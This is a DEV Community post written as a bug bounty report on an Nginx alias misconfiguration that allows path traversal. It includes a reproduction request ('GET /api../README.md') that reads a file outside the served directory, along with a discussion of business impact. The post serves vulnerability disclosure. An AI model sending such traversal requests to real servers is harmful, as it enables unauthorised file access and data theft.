DEV Community

João Victor
João Victor

Posted on

Nginx Alias Path Traversal

Path Traversal
Overview of the Vulnerability
Path traversal uses a server misconfiguration to access hidden files and directories that are stored on the served web application. This can include sensitive operating files, code and data that runs the application, or in some cases, user credentials.

An attacker can leverage the path traversal vulnerability in this application to gain access to system files in a folder of a directory that is not intended for public access.

Business Impact
Path traversal can lead to reputational damage for the business due to a loss in confidence and trust by users. It can also result in data theft and indirect financial losses to the business through the costs of notification and rectifying and breached PII data if an attacker can successfully exfiltrate user data.

Steps to Reproduce
Use burp to replicate this request:

GET /api../README.md HTTP/2
Host: site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Connection: Keep-alive
Enter fullscreen mode Exit fullscreen mode

Note that it was possible to read the contents of the file.

I performed other checks, but I was unable to read the name of other commonly identified files, but you can better validate by checking the name of other files that actually exist on the server and properly validate the vulnerability.
Also note that the information contained in the readme file is partly from the external environment, where it mentions internal files, shows the execution of a cron job, displays the name of the internal server, among other information.

PoC:

Image description

Reward/Status:

Image description

Top comments (0)